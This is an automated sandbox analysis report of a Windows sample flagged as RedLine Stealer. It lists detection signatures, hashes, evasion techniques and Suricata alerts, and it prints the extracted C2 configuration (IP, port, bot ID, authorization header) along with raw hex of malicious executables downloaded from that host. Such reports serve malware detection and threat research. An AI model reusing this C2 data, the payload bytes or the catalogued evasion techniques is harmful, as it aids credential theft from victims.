Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1568551
MD5: 031377e4e34dcd19917fac02ff6da79f
SHA1: 0fcccffee83cbb77a87ca1b55abc8e18fb267afc
SHA256: d58061a43df6b63e97421904c066ed5ad4b87a3733c250e105e83bc7154d9414
Tags: exex64user-jstrosch
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Found malware configuration
Source: 9.0.4A64.tmp.x.exe.a90000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["176.111.174.140:1912"], "Bot Id": "Diamotrix", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 63%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064520856.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064896907.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.17.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061121081.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
Source: Binary string: ucrtbase.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062000144.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060653755.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.17.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063366831.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064195340.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065057061.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: el.pdb..*_7y source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077350907.00007FFE13321000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.17.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061481679.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063629133.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063097579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.17.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064066874.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060774088.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062380579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060399599.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060993419.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063927305.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, select.pyd.17.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062650438.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
Source: Binary string: ucrtbase.pdbUGP source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
Source: Binary string: vcruntime140.amd64.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065357794.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061370875.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
Source: Binary string: el.pdb source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063235629.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062246272.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060529722.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.17.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063763840.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2076606633.00007FFDFB05D000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061860819.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064634549.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062506692.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062119686.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065508474.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062783484.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063492265.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.17.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062952516.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061257377.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064769321.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061739114.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061629125.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.17.dr
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064404985.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065202903.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E85A0 FindFirstFileExW,FindClose, 17_2_00007FF69F3E85A0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 17_2_00007FF69F3E79B0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F400B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00007FF69F400B84
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E85A0 FindFirstFileExW,FindClose, 18_2_00007FF69F3E85A0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F400B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF69F400B84
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 18_2_00007FF69F3E79B0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC9303C FindFirstFileExW,FindNextFileW,FindClose, 18_2_00007FFDFFC9303C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC93280 FindFirstFileExW,FindNextFileW,FindClose, 18_2_00007FFDFFC93280

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49739 -> 176.111.174.140:1912
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49739 -> 176.111.174.140:1912
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 176.111.174.140:1912 -> 192.168.2.4:49739
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49737 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 176.111.174.140:1912 -> 192.168.2.4:49739
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 176.111.174.140 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 176.111.174.140:1912
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49739 -> 176.111.174.140:1912
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 01:23:29 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 18 Oct 2024 19:00:38 GMTETag: "4b200-624c4eb378792"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 9e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 2c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 01:23:31 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 01 Dec 2024 15:52:16 GMTETag: "5a4530-628376a94bc71"Accept-Ranges: bytesContent-Length: 5915952Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 30 86 4c 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7d 1a 5b 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 176.111.174.140 176.111.174.140
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WILWAWPL WILWAWPL
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49731 -> 176.111.174.140:80
